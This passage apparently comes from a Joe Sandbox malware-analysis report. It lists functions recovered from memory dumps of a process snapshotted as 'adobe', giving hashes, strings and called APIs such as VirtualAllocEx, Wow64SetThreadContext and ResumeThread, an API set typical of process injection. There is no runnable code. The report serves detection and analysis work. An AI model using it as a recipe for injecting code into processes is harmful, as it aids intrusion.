Opcode Fuzzy Hash: e5a8767b107423c2bf61fab91498b552b6db9bee9b804987225085e6ce6a37f0
Instruction Fuzzy Hash: B421F5B1D003599FCB10DFAAC985AEEBBF5FF48320F10842AE559A7250C7799944CBA4

Function 070B60D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070B6156

Strings

$F6A, xrefs: 070B60F4

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: ContextThreadWow64
String ID: $F6A
API String ID: 983334009-4072994420
Opcode ID: 68b61aff6615f40a0e1f7a6a6520176ec4644c9213a9e7d64987ce95be54d7ed
Instruction ID: d3c0debae9e34df4fed15c3acf05f49b462e189a06823a635a2645c4fff8fc8b
Opcode Fuzzy Hash: 68b61aff6615f40a0e1f7a6a6520176ec4644c9213a9e7d64987ce95be54d7ed
Instruction Fuzzy Hash: 682107B1D002599FDB20DFAAC4857EEBBF4AB88324F148429D459A7341C7799944CFA4

Function 070B60D2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 070B6156

Strings

$F6A, xrefs: 070B60F4

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: ContextThreadWow64
String ID: $F6A
API String ID: 983334009-4072994420
Opcode ID: 4fd7c8fc629f2908363c85d155c335b63e1f859cafd88fdbf7187267e3afc6bd
Instruction ID: bc7cedd6919f1226e098ef10df61d3d96539900226cf6d858eee16ce9e9f5f7d
Opcode Fuzzy Hash: 4fd7c8fc629f2908363c85d155c335b63e1f859cafd88fdbf7187267e3afc6bd
Instruction Fuzzy Hash: 4A2137B1D003498FDB20DFA9C4847EEBFF4AF89324F14852AD499A7241C7789945CFA4

Function 070B61AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070B621E

Strings

$F6A, xrefs: 070B61C7

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: AllocVirtual
String ID: $F6A
API String ID: 4275171209-4072994420
Opcode ID: 616c2700789c7729d768289223080d69e1f4f3909593cee5319c40fc77fbead6
Instruction ID: 0532b45c43dd16f09f15c39f36d8505cf4795056fa240b5b7f1e9625fd00c224
Opcode Fuzzy Hash: 616c2700789c7729d768289223080d69e1f4f3909593cee5319c40fc77fbead6
Instruction Fuzzy Hash: 3A1159B19002499FCB20DFA9C844ADFFFF5EF48320F248819E555A7250C7759944CFA4

Function 011CABB8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011CB481,00000800,00000000,00000000), ref: 011CB672

Strings

$F6A, xrefs: 011CB627

Memory Dump Source

Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd

Similarity

API ID: LibraryLoad
String ID: $F6A
API String ID: 1029625771-4072994420
Opcode ID: 512e8410411c268c7c837e3525d04f5083f0c04a3ba7c0c5edef1828f3378f4f
Instruction ID: 59025e7548c632df0c30808836d7d69d7923f5f56bbc11dd64b0259ed8e75401
Opcode Fuzzy Hash: 512e8410411c268c7c837e3525d04f5083f0c04a3ba7c0c5edef1828f3378f4f
Instruction Fuzzy Hash: 2C1144B6C042189FDB24CF9AC444ADEFBF4EB98310F10802ED519B7210C375A544CFA8

Function 011CB602 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,011CB481,00000800,00000000,00000000), ref: 011CB672

Strings

$F6A, xrefs: 011CB627

Memory Dump Source

Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd

Similarity

API ID: LibraryLoad
String ID: $F6A
API String ID: 1029625771-4072994420
Opcode ID: c3bd04d1256e550f056745aa1fa3a6debcfb55cc1d172229fa8e66bd33a1480a
Instruction ID: c70214e6d4160ea3f6fae93eb7faa88dfcc3050b1fdcbadd7bf082e5a8ec1a09
Opcode Fuzzy Hash: c3bd04d1256e550f056745aa1fa3a6debcfb55cc1d172229fa8e66bd33a1480a
Instruction Fuzzy Hash: A5111FB6C002598FDB24CF9AC544ADEFBF4AB58320F10842AD559A7210C379A545CFA4

Function 070B5BE8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 070B5C52

Strings

$F6A, xrefs: 070B5C07

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: ResumeThread
String ID: $F6A
API String ID: 947044025-4072994420
Opcode ID: 100564c753257259e89e3f32b0992788abea519c749672b93af390d5781c87c2
Instruction ID: 63decb723a62e0c228aa73d7064325d1a0f176cc362584c5c5e138a882a3c8b2
Opcode Fuzzy Hash: 100564c753257259e89e3f32b0992788abea519c749672b93af390d5781c87c2
Instruction Fuzzy Hash: 8F1149B19002498FCB20DFAAC8457DEFFF5EF88324F248859D459A7250D6756544CFA4

Function 070B61B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 070B621E

Strings

$F6A, xrefs: 070B61C7

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: AllocVirtual
String ID: $F6A
API String ID: 4275171209-4072994420
Opcode ID: a6f98d0b52c3bced6f678b6ebe2dc071019bcbc42191c8cb2d2a19427aa518f8
Instruction ID: f7073d4c86c103e7699bcae5e111434b914ee53633cf29901d59ad0e24f65cea
Opcode Fuzzy Hash: a6f98d0b52c3bced6f678b6ebe2dc071019bcbc42191c8cb2d2a19427aa518f8
Instruction Fuzzy Hash: 451156B28002499FCB20DFAAC844ADEBFF5EB48320F108819E555A7250C775A944CFA4

Function 05C2A918 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 05C2A978

Strings

$F6A, xrefs: 05C2A93A

Memory Dump Source

Source File: 00000003.00000002.1817310629.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5c20000_adobe.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID: $F6A
API String ID: 2591292051-4072994420
Opcode ID: 7042697d7cc2fa9e7bdbddac6ae3eb30f003450e5885b6ef6b35dc556c8f56e8
Instruction ID: 8ce5a94a05c12ca3931695b27efdb1ba8947782b85ca32700382112aa886098f
Opcode Fuzzy Hash: 7042697d7cc2fa9e7bdbddac6ae3eb30f003450e5885b6ef6b35dc556c8f56e8
Instruction Fuzzy Hash: E31128B5900259CFCB10DF9AC945BDEBBF4EB48320F108419D958A7350D378A544CFA5

Function 070B5BF0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 070B5C52

Strings

$F6A, xrefs: 070B5C07

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: ResumeThread
String ID: $F6A
API String ID: 947044025-4072994420
Opcode ID: ff64e3aaebd41b11a9fc8cd24f6e14ab9af9aff1844cf85988b152b114df2071
Instruction ID: ec8337942f0479b1658aa9486bc57b2caa3d24bec968562ee6868eb273b89b4c
Opcode Fuzzy Hash: ff64e3aaebd41b11a9fc8cd24f6e14ab9af9aff1844cf85988b152b114df2071
Instruction Fuzzy Hash: 15113AB1D003498FCB20DFAAC4457DEFBF9EB88324F248419D459A7250C775A944CFA4

Function 070B8950 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 070B89B5

Strings

$F6A, xrefs: 070B8972

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: MessagePost
String ID: $F6A
API String ID: 410705778-4072994420
Opcode ID: cbf12229b5fb570b77924c5024f7dbaf414cd24437a817f78552ed9275c6bf4d
Instruction ID: e05d367ed9b341f583d4cb92e9a006c935551c86bf51b86683e9210d8545500c
Opcode Fuzzy Hash: cbf12229b5fb570b77924c5024f7dbaf414cd24437a817f78552ed9275c6bf4d
Instruction Fuzzy Hash: 321113B5800249DFCB20CF9AD484BDEBFF8EB48324F148459E458A7610C375A584CFA5

Function 011CB3A0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 011CB406

Strings

$F6A, xrefs: 011CB3BF

Memory Dump Source

Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd

Similarity

API ID: HandleModule
String ID: $F6A
API String ID: 4139908857-4072994420
Opcode ID: b53255258c454a84bd12405f8abd12a8eb27c1e427702103fc763bca2588050b
Instruction ID: 5e0453f802577edf1110ca71bb44910fe13b5ce881634b8c99ae611ae4037d84
Opcode Fuzzy Hash: b53255258c454a84bd12405f8abd12a8eb27c1e427702103fc763bca2588050b
Instruction Fuzzy Hash: 0D1110B5C043498FDB24CF9AD444ADEFBF4AB88324F10842AD819B7210C379A545CFA5

Function 05C2A920 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 05C2A978

Strings

$F6A, xrefs: 05C2A93A

Memory Dump Source

Source File: 00000003.00000002.1817310629.0000000005C20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5c20000_adobe.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID: $F6A
API String ID: 2591292051-4072994420
Opcode ID: 0789bc92078583163204e475a2e2986ba9ffb4c63675f6b7880fb7405a3eb07d
Instruction ID: 540bebc8284560f205d424860998d7f0a5ee8c9f25c8aac34578b27fa48431f5
Opcode Fuzzy Hash: 0789bc92078583163204e475a2e2986ba9ffb4c63675f6b7880fb7405a3eb07d
Instruction Fuzzy Hash: BA1103B5800259CFCB20DF9AD945BDEBBF4EB48320F11841AD558A7250D778A944CFA5

Function 070B4AFC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 070B89B5

Strings

$F6A, xrefs: 070B8972

Memory Dump Source

Source File: 00000003.00000002.1817896025.00000000070B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_70b0000_adobe.jbxd

Similarity

API ID: MessagePost
String ID: $F6A
API String ID: 410705778-4072994420
Opcode ID: a84993bb45057f48b8687e357dc18c77ed15d674409504add8b48c0a4f0f32fb
Instruction ID: b905f27b3cefb9b9e1a5b9e60e82c7d976aa26a1cb7425e35e07992f720a909c
Opcode Fuzzy Hash: a84993bb45057f48b8687e357dc18c77ed15d674409504add8b48c0a4f0f32fb
Instruction Fuzzy Hash: 371122B5800349DFDB20CF9AC448BDEBBF8EB58324F108419E558A7250C375A984CFA1

Function 08AA4833 Relevance: 2.6, Strings: 2, Instructions: 119COMMON

Download Yara Rule

Strings

Tekq, xrefs: 08AA4877
Tekq, xrefs: 08AA48D3

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq$Tekq
API String ID: 0-2269808460
Opcode ID: 28c260826de726f9cdbb56f7133a87fee28810214addc1d50fa1062c890c45f1
Instruction ID: 4bcb8637f66739ac80374423fe416d9534008281ede363f7b1333d0f4cab58fb
Opcode Fuzzy Hash: 28c260826de726f9cdbb56f7133a87fee28810214addc1d50fa1062c890c45f1
Instruction Fuzzy Hash: 884177B4B002049BD704AFA8D595BAE76F7EB88705F209419F905A7788CF789C07CBD5

Function 08AA4838 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

Tekq, xrefs: 08AA4877
Tekq, xrefs: 08AA48D3

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq$Tekq
API String ID: 0-2269808460
Opcode ID: 7ad147e761a0302b6e3ae0b03e0061d924c2fef0f25d1da4cd46b8cd2a815752
Instruction ID: 7c5936d95c214c27710aaf441f9f3f55259ee690995d3837227dba55fde3d781
Opcode Fuzzy Hash: 7ad147e761a0302b6e3ae0b03e0061d924c2fef0f25d1da4cd46b8cd2a815752
Instruction Fuzzy Hash: BE4188B4B002049BD704AFA8D595BAE76F7EB88705F209419F905A7788CF789C07CBD5

Function 011C5A84 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1812914544.00000000011C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 011C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_11c0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ea3d058a827ec7ca5d0d91fc38b3de524ca2bc395b8f946e8abcdd589025202
Instruction ID: e238506ff6e0c1fd3cf2e02ee16170c190e2f089e07d90f3175be193e95f9999
Opcode Fuzzy Hash: 6ea3d058a827ec7ca5d0d91fc38b3de524ca2bc395b8f946e8abcdd589025202
Instruction Fuzzy Hash: 82310CB1904209CFDB18CBA8C8447EDBFB2AF66714F14818EC009AB266DB75A846CB41

Function 08AA1DC0 Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

$F6A, xrefs: 08AA1DF7

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: $F6A
API String ID: 0-4072994420
Opcode ID: d1ec6ced2234ebd2a65c054cfbb6d96bd5a7e8833e2ec28164c4a0c5073b1db6
Instruction ID: 715f8e4afe3fe94d0107c7108f14123a335c4c7b51fdfaa8d55b68444acd9b37
Opcode Fuzzy Hash: d1ec6ced2234ebd2a65c054cfbb6d96bd5a7e8833e2ec28164c4a0c5073b1db6
Instruction Fuzzy Hash: 08618835E00248DFCB14EFA9D594BEDBBF1EF88315F14816AE406AB760DB74A844CB61

Function 08AA1DD0 Relevance: 1.4, Strings: 1, Instructions: 152COMMON

Download Yara Rule

Strings

$F6A, xrefs: 08AA1DF7

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: $F6A
API String ID: 0-4072994420
Opcode ID: b99c09a7ca8512545b2e74973dc19817454448c3081d68d14f14ba5dc23072aa
Instruction ID: c0e77625ec878028a20fb835ac3152a13176763cc289b2f233bbc797a5505309
Opcode Fuzzy Hash: b99c09a7ca8512545b2e74973dc19817454448c3081d68d14f14ba5dc23072aa
Instruction Fuzzy Hash: 6A515934E00248DFCB14DFA8D594AEDBBB2FF88300F14816AE406AB764DB74A845CB61

Function 08AA46C8 Relevance: 1.4, Strings: 1, Instructions: 151COMMON

Download Yara Rule

Strings

Tekq, xrefs: 08AAAAF1

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 4536cb875b59096e8a86127890937aa31f007532ca9999d45d586408148826cf
Instruction ID: 1a3c4c86a3785a437c5304a92b994e77af7838fdb8a09b3640879bcb88cbd4e1
Opcode Fuzzy Hash: 4536cb875b59096e8a86127890937aa31f007532ca9999d45d586408148826cf
Instruction Fuzzy Hash: F051AF75B002158FCB14DBB9D9849AEBBF6EFC42607148529E42AD7791EF30DD068B50

Function 08AAA8C4 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

$F6A, xrefs: 08AABDBF

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: $F6A
API String ID: 0-4072994420
Opcode ID: 7a76be7e7b19869d3de9a34446e5bde76f3d64e2642799d3f9e268c6592ba53f
Instruction ID: 3571cd126018c21c8daa2d2aa45ce9a54545be1aae79471c93f7ca4c277284e1
Opcode Fuzzy Hash: 7a76be7e7b19869d3de9a34446e5bde76f3d64e2642799d3f9e268c6592ba53f
Instruction Fuzzy Hash: 123137B5900208EFCF14DFA9D984ADEBFF9EB48320F14842AE509E7611D734A955CFA4

Function 08AA11A8 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

$F6A, xrefs: 08AA11CA

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: $F6A
API String ID: 0-4072994420
Opcode ID: cb859bfc7ad128b3967f239dcc23c5c220326dd481e2f6860600c62b8d8b6d00
Instruction ID: faee2e4b326f1ad383b89300eac852a85ee4e796213c5ba38d8b9c90bf28f459
Opcode Fuzzy Hash: cb859bfc7ad128b3967f239dcc23c5c220326dd481e2f6860600c62b8d8b6d00
Instruction Fuzzy Hash: E54124B1D01248EFDB14DF99D984BDEBBF5AF48314F24802AE406A7640DB759849CF90

Function 08AA119F Relevance: 1.3, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

$F6A, xrefs: 08AA11CA

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: $F6A
API String ID: 0-4072994420
Opcode ID: f785101500794fa8faa5d6e8173794d394b771c383731637d1734838cc41906d
Instruction ID: fab51f0dc06a21eb1c106d0bcccf6799ebd27c83a6e2944a8a146fba3b8e5044
Opcode Fuzzy Hash: f785101500794fa8faa5d6e8173794d394b771c383731637d1734838cc41906d
Instruction Fuzzy Hash: B33113B1D00248AFDB14CFE9C584BEEBBB5AF48304F24802AE405B7694D7759888CF50

Function 08AAAB35 Relevance: 1.3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

Strings

$F6A, xrefs: 08AAAB65

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: $F6A
API String ID: 0-4072994420
Opcode ID: 8064a6298149774e372e56f16fb0e73939b64a07c997d452dae9d3d4c6b76650
Instruction ID: f3c782cbff89eda8613098bf79a10ae598e4447e19d4a56766ca7084862a1318
Opcode Fuzzy Hash: 8064a6298149774e372e56f16fb0e73939b64a07c997d452dae9d3d4c6b76650
Instruction Fuzzy Hash: 9531D2B4D01228DFEB20DF99D585BCEBFF5AB08315F24841AE404BB650C7B96885CFA5

Function 08AA480C Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

$F6A, xrefs: 08AAAB65

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: $F6A
API String ID: 0-4072994420
Opcode ID: ba7e8eb50f49417b8ce9359f04e2e10a11a53a992fa471d18c0d7b15198e2af2
Instruction ID: 3c6fb7db096e16367a98c9b4f070630f95ab1ef5f118eb2a9b55ecddff247077
Opcode Fuzzy Hash: ba7e8eb50f49417b8ce9359f04e2e10a11a53a992fa471d18c0d7b15198e2af2
Instruction Fuzzy Hash: 9F31D3B0D01228DFDB20DF99C588B9EBFF5EB08714F24845AE404BB650C7B56885CFA4

Function 08AAA279 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

8oq, xrefs: 08AAA2DF

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: 8oq
API String ID: 0-3198120224
Opcode ID: 36102c9690c2e4967606af6c4a093d7931b8be1959d52a7f0db8ba171a72e440
Instruction ID: a21599a582971d3736f54b0e6c235187e0ab1694a3f91c576c59aae515d7f3bc
Opcode Fuzzy Hash: 36102c9690c2e4967606af6c4a093d7931b8be1959d52a7f0db8ba171a72e440
Instruction Fuzzy Hash: 7F11C1793042108FC705AB69E991E9F77FAEBC9212B14902EE50AD7655CF258C07CFA1

Function 08AAA4A8 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Tekq, xrefs: 08AAA513

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 81998c0d8e8d9297ee6678d8c623a414e3cf765744a3823f8cf45fd30d1aa81a
Instruction ID: 9bd1412b5899427c226d9a4868098c12d9558a8d8c0e761a0a45a238f3a361f7
Opcode Fuzzy Hash: 81998c0d8e8d9297ee6678d8c623a414e3cf765744a3823f8cf45fd30d1aa81a
Instruction Fuzzy Hash: 3B115A71B0021A8BCB15EBB999006EFB7F6AF88311B20407DC505E7754EB36AE01CBE5

Function 08AAA8D4 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

$F6A, xrefs: 08AABDBF

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: $F6A
API String ID: 0-4072994420
Opcode ID: f01fd801316daa8355b90ca405085f89283e5447dde2853ea862f78af99631a2
Instruction ID: 615d4df27f3c96ec836a4df6304c0aa5a288c041c47a7237646fc2799721d78c
Opcode Fuzzy Hash: f01fd801316daa8355b90ca405085f89283e5447dde2853ea862f78af99631a2
Instruction Fuzzy Hash: EB2103B5900249DFCB20CF9AD884BDEBBF4FB48320F10841AE918A7610C375A954CFA5

Function 08AA0860 Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

Tekq, xrefs: 08AA089B

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 878c9712b074b7a377cb2036f296120806bb4cfa8109d7ed34fd9a138e0b90d6
Instruction ID: 8f06ac638591ca2404efee1282162a8474bf59aeb4e9898280d9f249512d2281
Opcode Fuzzy Hash: 878c9712b074b7a377cb2036f296120806bb4cfa8109d7ed34fd9a138e0b90d6
Instruction Fuzzy Hash: 9D011D763001008FCB44EB79D599A5AB7E7EFC8710724952DE606C7366CE71EC068B50

Function 08AA085A Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

Tekq, xrefs: 08AA089B

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID: Tekq
API String ID: 0-2319236580
Opcode ID: 81a93c4dcdf089f3371e6df6fa529691926b55876796db5430eb9f51bf18d3b2
Instruction ID: cb773985af63e8fb8291edf6d73c16075c25fcef53efbf6865eefea419048e92
Opcode Fuzzy Hash: 81a93c4dcdf089f3371e6df6fa529691926b55876796db5430eb9f51bf18d3b2
Instruction Fuzzy Hash: F0016D763001008FCB44EB79D599A6AB7E6AFC9710724942DE206CB36ACE31EC0A8B50

Function 08AA2A9B Relevance: .2, Instructions: 231COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae0a3503ef6c26c910e2b5b75bd5c31cf670aa30baed7b862bf044cba2e31be3
Instruction ID: 2f729637125ca84fbf8f0dedd959e5f89b7f5d0988a663632f5a52e7a2d2e3d2
Opcode Fuzzy Hash: ae0a3503ef6c26c910e2b5b75bd5c31cf670aa30baed7b862bf044cba2e31be3
Instruction Fuzzy Hash: DF916A747006008FC345AB78D595BAEBBF6EBC9301F10952DE51A9B348DF34A947CB91

Function 08AA2AA0 Relevance: .2, Instructions: 230COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 05677f072152c720ca1e8a9302a10f76472135a1d15488dbcb056733da620f47
Instruction ID: 96e9fb239b3898f466dd5461bead5fc6e6a78213457e7fe10f9ffa07036a70e1
Opcode Fuzzy Hash: 05677f072152c720ca1e8a9302a10f76472135a1d15488dbcb056733da620f47
Instruction Fuzzy Hash: FD9169747006008FC345AB78D594BAEBBF6EBC9301F10952DE91A9B388DF34A947CB91

Function 08AA8749 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1818441475.0000000008AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 08AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_8aa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b43a6a91cc02221c36c78ab7d3b8b5e9e62bdb0bb1e5f6b4f5970bc2901013b7
Instruction ID: 20c60b68198e375d1f50b13581ba1952312ff3d85525162c222b9b793e7ccf4f
Opcode Fuzzy Hash: b43a6a91cc02221c36c78ab7d3b8b5e9e62bdb0bb1e5f6b4f5970bc2901013b7
Instruction Fuzzy Hash: A7510B74D16209DFCB00CFA8D584AFEBBB4FB0D682B015466E856B7B15DB389811CF60

Function 08AA8758 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

